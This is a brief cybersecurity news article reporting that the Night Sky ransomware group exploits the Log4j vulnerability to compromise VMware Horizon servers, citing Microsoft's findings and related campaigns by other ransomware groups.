New ransomware exploits vulnerabilities in Log4j to encrypt VMware servers

A ransomware operation identified as Night Sky has been infecting multiple VMware Horizon deployments thanks to the exploitation of the critical vulnerability in Log4j tracked as CVE-2021-44228. Threat actors search for vulnerable targets exposed online using malicious web domains disguised as cybersecurity and technology firms.

This ransomware group was first identified in late 2021 and appears to be focused on attacking enterprise networks. Although it is not yet clear how many victims of this group exist around the world, it has been confirmed that threat actors always demand a ransom of $800,000 USD.

This week, Microsoft also reported the detection of a campaign associated with the exploitation of this flaw in order to compromise VMware Horizon systems, used for the virtualization of cloud applications and desktop computers.

While the company managed to fix the Log4j flaws in Horizon and issue workarounds for customers who couldn’t install the latest version, there are still thousands of vulnerable deployments, which would facilitate ransomware infection: “Our research shows that successful intrusions stemming from this attack led to the deployment of NightSky ransomware.”  Microsoft points out.

This malicious operation has been identified on previous occasions by distributing other ransomware variants, including LockFile, AtomSilo, and Rook. In these incidents, cybercriminals exploited other flaws known as CVE-2021-26084 and CVE-2021-34473, which reside in Confluence and Exchage implementations.

About this attack vector, cybersecurity experts mention that Log4Shell is a very attractive attack vector for hackers because the Log4j component is present in all kinds of computer systems. In addition, exploiting the bug requires minimal effort from hackers and can trigger all kinds of risk scenarios.

The flaw can be exploited remotely in vulnerable deployments exposed on the Internet or from a local network, allowing local threat actors to move laterally to sensitive internal systems.

One of the hacking groups that began to exploit this flaw was the Conti ransomware operation, deploying massive attacks just a couple of days after the appearance of proof of concept (PoC). Khonsari ransomware hackers also deployed attacks linked to Log4j from an exploit available on GitHub.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.